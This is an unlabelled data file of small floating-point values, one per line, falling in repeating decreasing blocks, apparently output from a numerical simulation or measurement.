0.000780379
0.000780598
0.000776762
0.000785376
0.000785771
0.000789168
0.000789167
0.000789328
0.000785532
0.00078553
0.000734685
0.000734662
0.00073466
0.000699568
0.000699548
0.000699546
0.00070112
0.000664447
0.000664428
0.000664425
0.000666
0.000629327
0.00062931
0.000629307
0.000630881
0.000594207
0.000594189
0.000594187
0.000595759
0.000559083
0.000559056
0.000559061
0.00056064
0.000523953
0.000523934
0.000523929
0.000525508
0.000488812
0.000488793
0.000488797
0.000490374
0.000453671
0.00045365
0.000453654
0.000455228
0.000418532
0.00041851
0.000418516
0.000420085
0.000383391
0.000383372
0.000383379
0.000384947
0.000348254
0.000348237
0.000348238
0.00034981
0.00031312
0.000313104
0.000313104
0.000314676
0.000277987
0.000277973
0.00027797
0.000279543
0.000242863
0.000242847
0.000242847
0.000244414
0.000207734
0.000207724
0.000207716
0.000209283
0.000172597
0.000172587
0.000172584
0.000174143
0.000137452
0.000137449
0.000137444
0.000138988
0.000102295
0.000102291
0.000102291
0.0001038
6.71402e-05
6.71309e-05
6.71296e-05
6.85739e-05
3.26763e-05
3.21996e-05
3.21965e-05
3.33214e-05
6.63328e-06
7.2699e-06
7.26697e-06
5.67612e-06
0.000736232
0.000706751
0.000734661
0.000734663
0.000708326
0.000708327
0.000736232
0.000706757
0.000734658
0.000734661
0.000708326
0.000708324
0.000708332
0.00070833
0.000736231
0.00070675
0.000708327
0.000708325
0.000706755
0.000701116
0.00067163
0.000699546
0.000699546
0.000673205
0.000673207
0.000701119
0.000671634
0.000699544
0.000699542
0.000673204
0.000673203
0.000699548
0.000673208
0.000673207
0.000701113
0.00067163
0.000699545
0.000673204
0.000673205
0.000671635
0.000665996
0.000636514
0.000664425
0.000664427
0.000638087
0.000638089
0.000665999
0.000636516
0.000664426
0.000664425
0.000638089
0.000638085
0.000664426
0.000638089
0.000638087
0.000665995
0.000636511
0.000664426
0.000638086
0.000638088
0.000636516
0.00063088
0.000601394
0.000629307
0.000629308
0.000602966
0.000602965
0.00063088
0.000601393
0.000629309
0.000629306
0.000602966
0.000602969
0.000629308
0.000602969
0.000602966
0.000630876
0.000601396
0.000629308
0.00060297
0.000602963
0.000601394
0.000595756
0.000566276
0.000594186
0.000594186
0.000567845
0.000567842
0.000595759
0.000566265
0.000594184
0.000594187
0.000567843
0.000567842
0.000594185
0.000567838
0.000567843
0.000595758
0.00056627
0.000594184
0.000567844
0.000567847
0.000566276
0.000560637
0.000531144
0.000559059
0.000559062
0.000532719
0.000532716
0.000560629
0.000531145
0.000559062
0.000559062
0.000532718
0.000532716
0.000559061
0.000532717
0.000532714
0.000560634
0.000531146
0.000559064
0.000532714
0.000532714
0.000531145
0.000525506
0.000496003
0.000523937
0.000523934
0.00049758
0.000497578
0.000525508
0.000496006
0.000523935
0.00052393
0.000497578
0.000497581
0.000523932
0.000497576
0.000497581
0.000525503
0.000496011
0.000523933
0.000497581
0.000497582
0.000496011
0.000490366
0.000460863
0.000488795
0.000488794
0.000462438
0.000462437
0.000490366
0.000460866
0.000488794
0.000488796
0.000462439
0.000462438
0.000488796
0.000462437
0.00046244
0.00049037
0.000460869
0.000488797
0.000462439
0.00046244
0.000460868
0.000455225
0.000425728
0.000453654
0.000453651
0.000427294
0.000427296
0.000455225
0.000425724
0.000453655
0.000453655
0.000427296
0.000427301
0.000453655
0.000427296
0.000427296
0.000455229
0.000425728
0.000453654
0.000427302
0.000427297
0.000425727
0.000420085
0.000390583
0.000418511
0.000418513
0.000392157
0.000392157
0.000420085
0.000390584
0.000418509
0.000418516
0.000392158
0.000392157
0.000418512
0.000392156
0.000392156
0.000420087
0.000390587
0.000418513
0.000392162
0.000392161
0.000390587
0.000384943
0.000355442
0.000383373
0.000383374
0.000357017
0.000357019
0.000384945
0.000355446
0.000383373
0.000383371
0.000357017
0.000357019
0.000383373
0.000357019
0.000357018
0.000384946
0.000355449
0.000383376
0.000357023
0.000357019
0.00035545
0.000349805
0.000320312
0.000348235
0.000348237
0.000321883
0.000321881
0.000349807
0.000320312
0.000348235
0.000348238
0.000321881
0.000321884
0.000348237
0.000321885
0.000321886
0.000349808
0.00032031
0.000348237
0.000321883
0.000321886
0.000320315
0.000314673
0.000285178
0.000313102
0.000313102
0.00028675
0.000286752
0.000314675
0.00028518
0.0003131
0.000313105
0.000286747
0.000286752
0.000313106
0.000286751
0.000286755
0.000314672
0.000285178
0.000313105
0.000286752
0.000286753
0.000285183
0.000279539
0.000250054
0.000277971
0.000277974
0.000251622
0.000251625
0.000279541
0.000250056
0.000277968
0.000277973
0.000251623
0.000251622
0.000277976
0.000251624
0.000251627
0.000279538
0.000250052
0.000277972
0.000251625
0.000251626
0.000250057
0.000244411
0.000214928
0.000242845
0.000242848
0.000216498
0.000216499
0.000244416
0.000214928
0.000242847
0.000242845
0.000216499
0.000216491
0.000242849
0.000216499
0.000216498
0.00024441
0.000214922
0.000242849
0.000216494
0.000216496
0.00021493
0.000209282
0.000179793
0.000207723
0.000207723
0.000181364
0.000181362
0.000209282
0.000179797
0.000207722
0.000207718
0.000181359
0.000181358
0.000207722
0.000181361
0.000181364
0.000209277
0.000179789
0.00020772
0.000181359
0.000181364
0.000179797
0.000174139
0.000144654
0.000172587
0.000172587
0.000146219
0.000146219
0.000174142
0.000144653
0.000172585
0.000172583
0.000146218
0.000146219
0.00017259
0.000146222
0.000146221
0.000174135
0.000144656
0.000172588
0.000146219
0.000146219
0.000144663
0.000138984
0.000109501
0.000137444
0.000137443
0.000111064
0.000111066
0.000138981
0.000109507
0.000137443
0.000137445
0.000111065
0.000111064
0.000137444
0.000111066
0.000111064
0.000138984
0.000109506
0.000137444
0.000111062
0.000111063
0.000109504
0.000103801
7.43426e-05
0.000102293
0.000102292
7.58936e-05
7.58952e-05
0.000103802
7.43418e-05
0.000102292
0.000102291
7.58957e-05
7.58942e-05
0.000102289
7.58954e-05
7.58921e-05
0.000103803
7.4338e-05
0.00010229
7.58955e-05
7.58929e-05
7.43381e-05
6.85782e-05
3.92457e-05
6.71297e-05
6.71302e-05
4.08141e-05
4.08131e-05
6.85765e-05
3.92459e-05
6.71316e-05
6.71299e-05
4.08125e-05
4.08112e-05
6.71269e-05
4.08123e-05
4.08075e-05
6.85755e-05
3.92419e-05
6.71271e-05
4.08105e-05
4.08066e-05
3.92393e-05
3.33296e-05
8.25948e-06
3.22005e-05
3.22001e-05
1.03618e-05
1.03626e-05
3.33298e-05
8.26017e-06
3.22001e-05
3.21993e-05
1.03615e-05
1.03529e-05
3.2193e-05
1.03585e-05
1.03498e-05
3.33254e-05
8.25182e-06
3.21898e-05
1.03516e-05
1.03532e-05
8.2511e-06
5.67335e-06
7.27366e-06
7.2772e-06
5.67919e-06
7.27291e-06
7.26644e-06
6.63501e-06
6.63147e-06
6.6269e-06
7.26152e-06
5.67093e-06
7.26271e-06
0.000723759
0.000736791
0.000736781
0.000723753
0.000736797
0.000723748
0.000723751
0.000736795
0.000736785
0.000723749
0.000734686
0.000734683
0.000734686
0.00070835
0.00070835
0.000708349
0.00070835
0.000723852
0.00073674
0.000734671
0.000725883
0.000736682
0.000723801
0.000725891
0.000736795
0.000723743
0.000723857
0.000734667
0.000736743
0.000725879
0.000736689
0.000725883
0.000723801
0.000724297
0.000723751
0.000723754
0.000688651
0.000701677
0.000701672
0.00068864
0.000701684
0.000688637
0.000688648
0.000701674
0.000701663
0.00068864
0.000699568
0.000699567
0.000699569
0.000673226
0.000673228
0.000673225
0.000673225
0.000688755
0.000701627
0.000699552
0.000690766
0.00070157
0.000688696
0.000690771
0.000701677
0.000688635
0.000688751
0.000699553
0.000701623
0.000690763
0.000701568
0.00069077
0.000688693
0.000701681
0.000701685
0.000689194
0.000688643
0.000688642
0.000653537
0.000666561
0.000666551
0.000653527
0.000666566
0.00065352
0.000653532
0.000666557
0.00066655
0.000653525
0.00066445
0.000664446
0.000664445
0.000638107
0.000638112
0.000638108
0.000638107
0.000653639
0.000666509
0.000664432
0.000655648
0.000666453
0.000653579
0.000655653
0.000666562
0.000653518
0.000653632
0.000664431
0.000666507
0.000655644
0.000666445
0.000655651
0.000653577
0.000666565
0.000666562
0.000654074
0.000653525
0.000653524
0.000618415
0.000631442
0.000631434
0.000618406
0.000631449
0.000618403
0.000618417
0.000631442
0.000631436
0.000618406
0.000629331
0.000629328
0.000629327
0.000602987
0.000602989
0.00060299
0.000602986
0.000618519
0.000631391
0.000629316
0.000620528
0.000631334
0.000618461
0.000620535
0.000631449
0.000618403
0.000618513
0.000629313
0.000631387
0.000620527
0.000631332
0.000620533
0.000618456
0.000631448
0.000631445
0.000618961
0.000618409
0.000618403
0.000583292
0.00059632
0.000596311
0.000583288
0.000596324
0.000583283
0.000583299
0.000596325
0.000596316
0.00058329
0.000594209
0.000594208
0.000594205
0.000567865
0.000567865
0.000567865
0.000567863
0.000583397
0.000596272
0.000594196
0.000585404
0.000596218
0.000583343
0.000585412
0.000596333
0.000583287
0.000583395
0.000594194
0.00059627
0.000585406
0.000596214
0.000585413
0.000583339
0.000596333
0.000596329
0.00058383
0.000583285
0.000583287
0.000548173
0.000561203
0.000561193
0.000548165
0.000561209
0.00054816
0.000548172
0.0005612
0.000561194
0.000548166
0.000559084
0.000559082
0.000559081
0.000532738
0.000532736
0.000532735
0.000532734
0.00054827
0.000561151
0.000559066
0.000550276
0.000561089
0.000548217
0.000550285
0.000561207
0.000548157
0.000548269
0.000559067
0.000561149
0.000550279
0.00056109
0.000550286
0.000548213
0.0005612
0.000561202
0.000548706
0.000548158
0.000548159
0.000513041
0.000526074
0.00052606
0.000513029
0.000526076
0.000513023
0.000513039
0.000526072
0.000526065
0.00051303
0.000523952
0.000523951
0.000523951
0.000497598
0.000497597
0.000497599
0.000497599
0.000513137
0.000526014
0.000523934
0.000515146
0.00052596
0.000513081
0.000515146
0.000526079
0.000513027
0.000513137
0.000523938
0.000526021
0.000515144
0.00052596
0.000515154
0.000513081
0.000526072
0.000526073
0.000513575
0.000513024
0.000513024
0.000477899
0.000490934
0.000490925
0.000477889
0.000490938
0.000477884
0.0004779
0.000490932
0.000490925
0.000477889
0.000488813
0.000488814
0.000488814
0.000462456
0.000462454
0.000462459
0.000462458
0.000477995
0.000490874
0.000488798
0.000480009
0.000490818
0.000477937
0.000480015
0.000490939
0.000477887
0.000478002
0.000488802
0.000490882
0.000480008
0.000490824
0.000480016
0.000477946
0.000490932
0.000490937
0.000478439
0.000477885
0.000477889
0.000442758
0.00045579
0.000455779
0.000442749
0.000455796
0.000442743
0.000442754
0.00045579
0.000455781
0.000442747
0.000453669
0.000453674
0.000453673
0.000427316
0.000427315
0.000427317
0.000427317
0.000442857
0.000455737
0.000453658
0.000444863
0.000455679
0.000442799
0.000444873
0.000455795
0.000442744
0.00044286
0.00045366
0.00045574
0.000444866
0.000455684
0.000444874
0.0004428
0.000455796
0.000455798
0.000443294
0.000442748
0.000442747
0.000407613
0.000420651
0.000420642
0.000407606
0.000420654
0.000407601
0.000407622
0.000420651
0.000420642
0.00040761
0.000418531
0.000418533
0.000418532
0.000392177
0.000392176
0.000392177
0.000392177
0.000407715
0.000420598
0.000418518
0.000409724
0.000420537
0.000407659
0.000409732
0.000420656
0.000407602
0.000407716
0.00041852
0.000420599
0.000409732
0.000420541
0.000409736
0.000407658
0.000420655
0.000420653
0.000408153
0.000407603
0.000407603
0.000372474
0.000385508
0.0003855
0.000372466
0.000385515
0.000372458
0.000372478
0.000385509
0.000385502
0.000372466
0.000383392
0.000383393
0.000383394
0.000357038
0.000357037
0.000357039
0.000357039
0.000372576
0.000385455
0.000383378
0.000374584
0.000385401
0.000372519
0.000374595
0.000385517
0.000372465
0.000372578
0.000383381
0.000385456
0.000374592
0.0003854
0.000374596
0.00037252
0.000385514
0.000385513
0.000373015
0.000372468
0.000372467
0.00033734
0.00035037
0.000350363
0.000337331
0.000350376
0.000337329
0.000337336
0.000350371
0.000350361
0.000337329
0.000348254
0.000348256
0.000348256
0.000321903
0.000321902
0.000321903
0.000321904
0.00033744
0.000350318
0.000348239
0.000339451
0.000350261
0.000337383
0.000339454
0.000350378
0.000337326
0.000337442
0.000348242
0.000350321
0.000339449
0.000350264
0.000339456
0.000337386
0.000350377
0.000350377
0.00033788
0.000337329
0.00033733
0.000302201
0.000315237
0.000315228
0.000302196
0.000315241
0.000302189
0.000302207
0.000315235
0.000315229
0.000302196
0.00031312
0.000313121
0.000313122
0.00028677
0.000286771
0.000286771
0.000286772
0.000302309
0.000315182
0.00031311
0.000304315
0.000315128
0.000302255
0.000304324
0.000315239
0.000302189
0.000302309
0.000313109
0.000315182
0.000304318
0.000315128
0.000304323
0.00030225
0.00031524
0.000315243
0.000302749
0.000302197
0.000302196
0.000267082
0.000280105
0.000280096
0.00026707
0.00028011
0.000267064
0.000267073
0.000280106
0.000280095
0.000267064
0.000277991
0.00027799
0.000277991
0.000251644
0.000251644
0.000251642
0.000251643
0.000267178
0.000280053
0.000277979
0.000269187
0.000279996
0.000267123
0.000269194
0.000280108
0.000267058
0.000267179
0.000277974
0.000280054
0.000269184
0.000279996
0.000269193
0.00026712
0.00028011
0.000280109
0.000267616
0.000267068
0.000267069
0.000231955
0.000244979
0.000244973
0.000231945
0.000244989
0.000231939
0.000231952
0.000244977
0.00024497
0.000231942
0.000242864
0.000242862
0.000242863
0.000216517
0.000216518
0.000216513
0.000216515
0.000232057
0.000244925
0.000242849
0.000234059
0.000244874
0.000231998
0.000234066
0.000244981
0.000231935
0.000232051
0.00024285
0.00024492
0.000234061
0.000244867
0.000234066
0.000231991
0.000244981
0.00024498
0.00023249
0.000231943
0.000231937
0.000196824
0.000209849
0.000209847
0.000196812
0.00020986
0.000196807
0.000196822
0.000209848
0.000209842
0.000196816
0.000207736
0.000207733
0.000207734
0.000181379
0.00018138
0.000181378
0.000181381
0.000196928
0.000209797
0.000207729
0.000198933
0.000209745
0.000196872
0.00019894
0.000209854
0.000196801
0.000196923
0.000207718
0.000209795
0.000198925
0.000209741
0.000198931
0.000196865
0.000209852
0.000209851
0.000197364
0.000196812
0.000196809
0.000161685
0.000174711
0.000174711
0.000161673
0.000174723
0.000161664
0.000161681
0.000174708
0.000174705
0.000161671
0.000172598
0.000172597
0.000172599
0.000146236
0.000146237
0.000146235
0.000146235
0.0001618
0.000174659
0.000172588
0.000163792
0.000174612
0.000161734
0.000163793
0.000174719
0.000161661
0.000161785
0.000172589
0.000174651
0.00016379
0.000174603
0.000163798
0.000161726
0.000174715
0.000174713
0.000162228
0.000161673
0.000161675
0.000126531
0.000139561
0.000139559
0.000126526
0.00013958
0.000126509
0.000126532
0.000139562
0.000139564
0.000126526
0.000137454
0.000137452
0.000137452
0.00011108
0.000111078
0.000111079
0.000111079
0.000126644
0.000139506
0.000137451
0.000128647
0.000139464
0.000126587
0.000128655
0.000139578
0.000126509
0.00012665
0.000137442
0.000139506
0.000128641
0.000139467
0.000128646
0.000126589
0.000139571
0.000139569
0.000127085
0.000126529
0.000126528
9.13634e-05
0.000104402
0.000104411
9.13682e-05
0.000104433
9.13203e-05
9.13652e-05
0.000104401
0.00010441
9.13682e-05
0.000102293
0.000102295
0.000102295
7.59117e-05
7.59107e-05
7.59093e-05
7.59094e-05
9.14888e-05
0.000104335
0.000102283
9.34795e-05
0.000104309
9.14313e-05
9.34803e-05
0.000104434
9.13222e-05
9.14857e-05
0.00010229
0.000104336
9.34806e-05
0.00010431
9.34878e-05
9.14334e-05
0.000104403
0.000104404
9.19194e-05
9.1358e-05
9.13586e-05
5.61798e-05
6.92153e-05
6.92309e-05
5.61956e-05
6.93112e-05
5.60449e-05
5.61831e-05
6.92181e-05
6.92366e-05
5.61978e-05
6.71386e-05
6.71382e-05
6.71367e-05
4.10341e-05
4.10318e-05
4.10319e-05
4.1027e-05
5.63241e-05
6.91303e-05
6.71196e-05
5.8318e-05
6.91413e-05
5.62937e-05
5.83273e-05
6.93111e-05
5.60467e-05
5.63241e-05
6.71191e-05
6.91309e-05
5.83188e-05
6.91456e-05
5.83227e-05
5.62924e-05
6.92161e-05
6.92156e-05
5.67625e-05
5.61954e-05
5.61978e-05
2.06534e-05
3.38598e-05
3.39361e-05
2.02429e-05
3.4285e-05
1.91874e-05
2.06448e-05
3.38551e-05
3.39363e-05
2.02401e-05
3.26753e-05
3.26732e-05
3.26682e-05
1.16252e-05
1.16235e-05
1.16176e-05
1.16163e-05
2.11563e-05
3.37112e-05
3.24562e-05
2.37822e-05
3.39347e-05
2.07178e-05
2.42981e-05
3.4273e-05
1.91953e-05
2.1157e-05
3.245e-05
3.3711e-05
2.37781e-05
3.39464e-05
2.42907e-05
2.07173e-05
3.37479e-05
3.37506e-05
2.20121e-05
2.05446e-05
2.05449e-05
5.658e-07
2.95549e-06
3.35852e-06
2.31239e-06
4.96298e-06
-1.91368e-06
5.79293e-07
2.94221e-06
3.34398e-06
2.31177e-06
2.32784e-06
7.20553e-06
7.2037e-06
6.17976e-06
7.34272e-06
3.34593e-06
3.34555e-06
2.86954e-06
2.4918e-06
6.86984e-06
2.35941e-06
5.0578e-06
6.4863e-06
9.13649e-07
4.94127e-06
-1.9013e-06
2.8742e-06
6.8696e-06
2.48675e-06
2.35994e-06
5.05507e-06
9.14093e-07
6.48749e-06
-4.64278e-07
-4.60471e-07
1.8404e-06
6.2034e-06
6.21234e-06
0.000736795
0.000723746
0.000736798
0.000723744
0.000736792
0.000736795
0.000724296
0.000723747
0.000723747
0.000706194
0.000719233
0.000706192
0.000719229
0.000718676
0.000706197
0.000706195
0.000719229
0.000719227
0.000723759
0.000736792
0.000736783
0.000723754
0.000723849
0.000736738
0.000734669
0.00072588
0.000736683
0.000723801
0.00072589
0.00072385
0.000736739
0.000734671
0.000725884
0.000736683
0.0007238
0.000725891
0.000719219
0.0007062
0.000719229
0.000706212
0.00071922
0.000706201
0.000719232
0.00070621
0.000719117
0.000717103
0.000706251
0.000708335
0.000719176
0.000717114
0.000706318
0.000719116
0.000717107
0.000706255
0.000708335
0.000719175
0.000717113
0.000706319
0.000736793
0.000736795
0.000724299
0.00072375
0.000723749
0.000736798
0.000723748
0.000706195
0.000719236
0.000718681
0.0007062
0.000706202
0.000719232
0.000719231
0.000706199
0.000719235
0.00072385
0.00073674
0.000734668
0.000725879
0.000736682
0.000723798
0.000725887
0.000723755
0.00073679
0.000736783
0.00072375
0.00072385
0.000734668
0.000736737
0.000725879
0.000736681
0.000725885
0.000723799
0.000719213
0.000706196
0.000719223
0.000706204
0.000719112
0.000717104
0.000706249
0.000708333
0.000719171
0.000717113
0.000706314
0.000719215
0.000706195
0.000719224
0.000706204
0.000719113
0.000717103
0.000708332
0.000706249
0.00071711
0.000719171
0.000706312
0.000723756
0.000736793
0.000736788
0.000723753
0.000723851
0.000725882
0.000725891
0.000723803
0.000723757
0.000723755
0.000719117
0.00071711
0.000706257
0.000708336
0.000719175
0.000717114
0.000706319
0.00071922
0.000706205
0.000719229
0.000706218
0.000719117
0.000717107
0.000708336
0.000706254
0.000717115
0.000719176
0.000706318
0.000719219
0.000706202
0.000719232
0.000706214
0.000736792
0.000736799
0.000724296
0.000723746
0.000723748
0.000736801
0.000723748
0.000706191
0.00071923
0.000718675
0.000706195
0.000706196
0.000719227
0.000719229
0.000706193
0.000719233
0.000723858
0.000734668
0.00072588
0.000736688
0.000725886
0.000723806
0.000723765
0.000736797
0.000736791
0.000723753
0.000723764
0.000736791
0.000723757
0.000719117
0.000717104
0.000708334
0.000706252
0.000717109
0.000719174
0.000706318
0.00071912
0.000717103
0.000708334
0.000706256
0.000717111
0.000719181
0.000706318
0.000719221
0.0007062
0.000719227
0.000706212
0.000719223
0.000706205
0.000719235
0.000706212
0.00072375
0.000723751
0.000718674
0.0007062
0.000706202
0.000719232
0.000719236
0.000706197
0.000719237
0.0007062
0.000719239
0.000701681
0.000688636
0.00070168
0.000688636
0.000701679
0.000701678
0.000689192
0.000688639
0.00068864
0.000671078
0.000684124
0.000671077
0.000684124
0.000683552
0.000671081
0.000671081
0.000684121
0.000684121
0.000688653
0.000701679
0.00070167
0.000688643
0.000688759
0.000701623
0.000699554
0.000690766
0.000701567
0.000688695
0.000690772
0.000688757
0.000701625
0.000699554
0.000690766
0.000701569
0.000688696
0.000690772
0.000684111
0.000671084
0.000684119
0.000671093
0.000684113
0.000671086
0.00068412
0.000671094
0.000684008
0.000681985
0.000671137
0.000673211
0.000684065
0.00068199
0.000671199
0.000684007
0.000681987
0.000671139
0.00067321
0.000684066
0.00068199
0.0006712
0.000701682
0.000701683
0.000689196
0.000688641
0.000688641
0.000701687
0.000688637
0.00067108
0.000684125
0.000683558
0.000671084
0.000671084
0.000684122
0.000684119
0.000671081
0.000684123
0.000688751
0.00070162
0.000699551
0.000690763
0.000701565
0.000688693
0.000690769
0.000688647
0.000701672
0.000701664
0.000688639
0.00068875
0.00069955
0.000701619
0.00069076
0.000701563
0.000690768
0.000688692
0.000684108
0.000671083
0.000684116
0.000671093
0.000684001
0.000681983
0.000671135
0.000673208
0.000684063
0.000681988
0.000671194
0.000684106
0.000671081
0.000684117
0.000671093
0.000684
0.000681981
0.000673209
0.000671134
0.000681988
0.000684061
0.000671193
0.000688653
0.000701682
0.000701674
0.000688641
0.000688755
0.000699553
0.000701626
0.000690766
0.000701568
0.000690771
0.000688697
0.000688655
0.000701678
0.000701675
0.000688643
0.000684006
0.000681988
0.00067114
0.000673212
0.000684065
0.000681992
0.000671204
0.00068411
0.000671085
0.000684118
0.000671096
0.000684006
0.000681987
0.000673212
0.000671139
0.000681991
0.000684067
0.000671203
0.000684112
0.000671086
0.00068412
0.000671094
0.000701675
0.000701678
0.000689189
0.000688639
0.000688639
0.000701681
0.000688636
0.000671075
0.000684122
0.000683551
0.000671078
0.000671081
0.00068412
0.000684119
0.000671078
0.000684122
0.000688753
0.000699553
0.000701625
0.000690765
0.000701566
0.000690771
0.000688697
0.000688651
0.000701676
0.000701667
0.000688642
0.00068865
0.00070168
0.000701667
0.000688642
0.000684001
0.000681984
0.000673211
0.000671138
0.000681991
0.000684063
0.000671198
0.000684003
0.000681986
0.00067321
0.000671138
0.000681991
0.000684067
0.000671197
0.000684108
0.000671084
0.000684117
0.000671099
0.00068411
0.000671085
0.000684119
0.000671098
0.000701684
0.000688638
0.000701687
0.000688637
0.000683557
0.000671085
0.000671083
0.000684122
0.000684123
0.000671082
0.000684126
0.000671079
0.000684126
0.000666566
0.00065352
0.000666563
0.00065352
0.000666562
0.00066656
0.000654074
0.000653524
0.000653524
0.000635962
0.000649007
0.000635964
0.000649006
0.000648436
0.000635966
0.000635967
0.000649005
0.000649004
0.000653535
0.000666562
0.00066655
0.000653524
0.000653636
0.000666506
0.000664432
0.000655645
0.000666448
0.000653578
0.000655653
0.000653637
0.000666508
0.00066443
0.000655648
0.000666449
0.000653577
0.000655651
0.000648995
0.000635966
0.000649003
0.000635977
0.000648992
0.000635966
0.000649001
0.000635976
0.000648887
0.000646867
0.000636018
0.000638093
0.000648948
0.000646874
0.000636083
0.000648889
0.00064687
0.000636021
0.000638094
0.000648946
0.000646874
0.000636081
0.000666565
0.000666563
0.000654077
0.000653523
0.000653527
0.000666568
0.000653523
0.00063596
0.000649007
0.000648438
0.000635963
0.000635965
0.000649004
0.000649006
0.000635961
0.00064901
0.000653636
0.000666504
0.00066443
0.000655647
0.000666444
0.000653578
0.00065565
0.000653533
0.000666557
0.000666549
0.000653524
0.000653636
0.00066443
0.000666503
0.000655646
0.000666443
0.000655651
0.000653577
0.000648993
0.000635968
0.000649002
0.000635978
0.000648886
0.000646868
0.00063602
0.000638093
0.000648947
0.000646872
0.000636081
0.000648993
0.000635968
0.000649001
0.000635977
0.000648887
0.000646866
0.000638091
0.000636022
0.000646871
0.000648947
0.000636082
0.000653535
0.000666562
0.000666555
0.000653527
0.000653638
0.000664432
0.000666509
0.000655644
0.00066645
0.000655652
0.00065358
0.000653536
0.000666564
0.000666553
0.000653527
0.000648889
0.000646869
0.000636022
0.000638095
0.000648948
0.000646873
0.000636085
0.000648992
0.000635966
0.000649004
0.00063598
0.000648889
0.000646866
0.000638095
0.00063602
0.000646874
0.000648949
0.000636084
0.000648992
0.000635968
0.000649002
0.00063598
0.000666558
0.000666562
0.000654074
0.000653522
0.000653522
0.000666565
0.000653518
0.000635963
0.000649005
0.000648436
0.000635967
0.000635966
0.000649001
0.000649003
0.000635961
0.000649006
0.000653633
0.000664432
0.000666506
0.000655647
0.000666445
0.000655652
0.000653577
0.000653533
0.000666561
0.000666554
0.000653524
0.000653533
0.000666562
0.00066655
0.000653524
0.000648881
0.000646866
0.000638092
0.000636019
0.000646871
0.000648945
0.000636082
0.000648883
0.000646869
0.000638089
0.000636019
0.000646871
0.000648946
0.00063608
0.000648988
0.000635966
0.000649
0.000635978
0.00064899
0.000635966
0.000649002
0.000635977
0.00066657
0.000653521
0.000666566
0.000653521
0.000648438
0.000635966
0.000635964
0.000649004
0.000649004
0.000635963
0.000649008
0.000635961
0.000649008
0.000631448
0.0006184
0.000631449
0.000618401
0.000631444
0.000631446
0.000618956
0.000618404
0.000618405
0.000600839
0.000613887
0.000600843
0.000613889
0.000613319
0.000600843
0.000600846
0.000613884
0.000613885
0.000618417
0.000631445
0.000631433
0.00061841
0.000618516
0.000631389
0.000629312
0.000620526
0.00063133
0.000618459
0.000620532
0.000618515
0.00063139
0.000629314
0.000620526
0.000631329
0.000618461
0.000620533
0.000613873
0.000600844
0.000613881
0.000600854
0.000613873
0.000600843
0.000613885
0.000600854
0.000613765
0.000611747
0.000600897
0.000602972
0.000613827
0.000611751
0.000600959
0.000613764
0.000611745
0.000600896
0.000602971
0.000613829
0.000611751
0.00060096
0.000631445
0.000631445
0.000618956
0.000618407
0.000618404
0.000631449
0.0006184
0.000600839
0.00061389
0.000613317
0.000600842
0.000600849
0.000613888
0.000613885
0.000600844
0.000613889
0.00061852
0.000631388
0.000629313
0.000620528
0.000631329
0.00061846
0.000620534
0.000618417
0.000631444
0.000631434
0.000618408
0.00061852
0.000629311
0.00063139
0.000620525
0.00063133
0.000620533
0.000618463
0.000613873
0.00060085
0.000613883
0.00060086
0.000613771
0.000611748
0.000600903
0.000602971
0.000613829
0.000611754
0.000600965
0.000613875
0.000600852
0.000613883
0.000600859
0.000613771
0.000611748
0.000602973
0.000600903
0.000611755
0.00061383
0.000600965
0.000618418
0.000631444
0.000631435
0.000618406
0.000618521
0.000629315
0.00063139
0.000620527
0.000631332
0.000620535
0.000618461
0.000618416
0.000631443
0.000631436
0.000618409
0.000613769
0.000611749
0.000600904
0.000602976
0.00061383
0.000611755
0.000600968
0.000613877
0.00060085
0.000613884
0.000600859
0.000613772
0.000611747
0.000602972
0.000600907
0.000611754
0.000613832
0.000600967
0.000613876
0.000600856
0.000613887
0.000600863
0.000631445
0.000631445
0.000618955
0.000618408
0.000618403
0.000631447
0.0006184
0.000600846
0.00061389
0.000613318
0.000600849
0.000600846
0.000613888
0.000613884
0.000600843
0.000613887
0.000618514
0.00062931
0.000631387
0.000620526
0.000631327
0.000620531
0.000618459
0.000618414
0.000631442
0.00063143
0.000618403
0.000618413
0.000631442
0.00063143
0.000618405
0.000613763
0.00061175
0.000602976
0.0006009
0.000611755
0.000613826
0.000600963
0.000613765
0.000611744
0.000602973
0.0006009
0.000611753
0.000613828
0.000600962
0.000613866
0.00060085
0.00061388
0.000600856
0.000613868
0.000600846
0.000613881
0.000600855
0.000631449
0.000618405
0.000631448
0.0006184
0.000613319
0.000600856
0.000600848
0.00061389
0.000613886
0.000600852
0.000613894
0.000600844
0.000613888
0.000596326
0.000583284
0.00059633
0.000583285
0.000596323
0.000596326
0.000583834
0.000583288
0.000583289
0.000565723
0.000578771
0.00056572
0.000578772
0.000578197
0.000565728
0.000565724
0.000578768
0.00057877
0.000583295
0.00059632
0.000596309
0.000583287
0.000583396
0.000596266
0.000594191
0.000585405
0.000596206
0.000583339
0.00058541
0.000583395
0.000596264
0.000594192
0.000585405
0.000596207
0.000583339
0.000585411
0.000578752
0.000565726
0.000578764
0.000565737
0.000578753
0.000565726
0.000578764
0.000565735
0.000578645
0.000576627
0.000565781
0.000567849
0.000578708
0.000576629
0.000565841
0.000578645
0.000576624
0.00056578
0.00056785
0.000578708
0.000576629
0.00056584
0.00059632
0.000596328
0.000583837
0.000583287
0.000583287
0.00059633
0.000583284
0.000565722
0.000578771
0.000578197
0.000565726
0.000565729
0.000578767
0.000578765
0.000565725
0.000578771
0.000583399
0.000596273
0.00059419
0.000585403
0.000596213
0.000583342
0.00058541
0.000583301
0.000596329
0.000596318
0.000583293
0.000583399
0.000594192
0.000596273
0.000585404
0.000596213
0.00058541
0.000583345
0.000578755
0.000565724
0.000578766
0.000565739
0.000578649
0.000576624
0.000565779
0.00056785
0.000578709
0.000576631
0.000565841
0.000578758
0.000565728
0.000578768
0.000565736
0.000578648
0.000576623
0.000567849
0.00056578
0.000576629
0.000578712
0.000565841
0.000583296
0.000596325
0.000596315
0.000583288
0.000583398
0.000594192
0.000596275
0.000585404
0.000596214
0.000585413
0.000583343
0.000583295
0.000596331
0.000596319
0.000583289
0.000578646
0.000576622
0.000565783
0.000567849
0.000578711
0.000576631
0.000565842
0.000578752
0.00056573
0.000578764
0.000565738
0.000578648
0.000576624
0.000567848
0.000565776
0.000576633
0.00057871
0.00056584
0.000578753
0.000565726
0.000578763
0.000565737
0.000596329
0.000596327
0.000583833
0.000583291
0.000583285
0.00059633
0.000583281
0.000565723
0.000578774
0.000578195
0.000565728
0.000565729
0.00057877
0.000578765
0.000565724
0.000578768
0.000583396
0.000594194
0.000596269
0.000585405
0.00059621
0.000585413
0.000583339
0.000583295
0.000596326
0.000596311
0.000583285
0.000583294
0.000596323
0.000596311
0.000583286
0.000578644
0.000576626
0.00056785
0.000565781
0.000576631
0.000578708
